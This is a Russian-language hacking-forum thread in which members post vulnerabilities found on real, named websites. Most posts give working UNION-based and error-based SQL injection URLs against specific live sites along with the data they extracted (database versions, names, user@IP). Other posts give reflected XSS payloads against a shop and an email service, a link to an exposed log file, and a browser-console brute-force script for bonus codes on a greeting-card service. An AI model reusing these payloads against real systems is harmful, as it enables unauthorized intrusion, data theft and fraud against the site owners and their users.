Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Code:
    http://supersleep.ru/?ITEM_ID=2776+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
    
    5.5.43-0+deb7u1
     
  2. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Code:
    http://www.dutchaero.nl/index.php?catid=13+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6
    
     
  3. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
  4. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,369
    Likes Received:
    868
    Reputations:
    20
  5. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,version%28%29,3,4,5,version%28%29,7--+-
    
    5.0.83
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,database%28%29,3,4,5,version%28%29,7--+-
    
    teamboad
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,user%28%29,3,4,5,version%28%29,7--+-
    
    teamboad@172.20.245.62
     
    WallHack likes this.
  6. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,369
    Likes Received:
    868
    Reputations:
    20
    уже заезжанный сайт
     
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Может запретить такие ссылки?
    Тема вроде для публикация лично найдены уязвимостей, а [t] подставляет софт.
    Человек закинул ссылки в программу и она кучей их проверяет.
    При публикации даже [t] не убирают.
     
    _________________________
  8. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    119
    Likes Received:
    47
    Reputations:
    14
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
  10. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    119
    Likes Received:
    47
    Reputations:
    14
    <script>alert()</script>

    фильтрует
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    _________________________
    Octavian likes this.
  12. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    BabaDook likes this.
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    PHP:
    http://vic.md/ro/notebook/list/all/1/producator_ID=9999)+and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 81,1),0x3a,floor(rand(0)*2))y from information_schema.tables  group by y ) x)+AND+(1)=(1 #   

    AND+(1)=(1 это не нужно. Просто 9999 без )
     
    Octavian likes this.
  14. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    http://takky-shop.ru/images/img/log.txt
    Открытый лог .
    Reflected XSS
    Code:
    http://takky-shop.ru/category/"><script>alert()</script>
    Code:
    http://takky-shop.ru/search
    в поисковике тоже XSS .
     
  15. waydam

    waydam New Member

    Joined:
    14 Aug 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    10minutemail.com
    XSS

    Еще интересная особенность, письмо дублируется много раз и каждый раз выскакивает алерт, не знаю с чем это связано)
     
    #235 waydam, 22 Aug 2016
    Last edited: 22 Aug 2016
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
  17. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?
    Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.
    Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:
    Первое, авторизовываемся не через телефон, а средствами забытого пароля:
    [​IMG]
    Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.
    [​IMG]
    Далее тупо перебираем скриптом в консоле
    Code:
    for (var i = 800000; i < 800100; i++) { $('.bonus-text').val(i); $('.bonus-send').click(); }
    Что интересно под авторизацией через телефон дает только три попытки, а через средство забытого пароля без ввода телефона - без проблем сколько угодно, связано скорее всего с куками.
    Ну и профитик
    [​IMG]
    Репорт отправлен и на момент написания статьи уже пофикшено. А добрые ребятки отправили мне в благодарность много бесплатных кодов.
     
    _________________________
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    #238 BabaDook, 25 Oct 2016
    Last edited: 26 Oct 2016
  19. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    119
    Likes Received:
    47
    Reputations:
    14
Loading...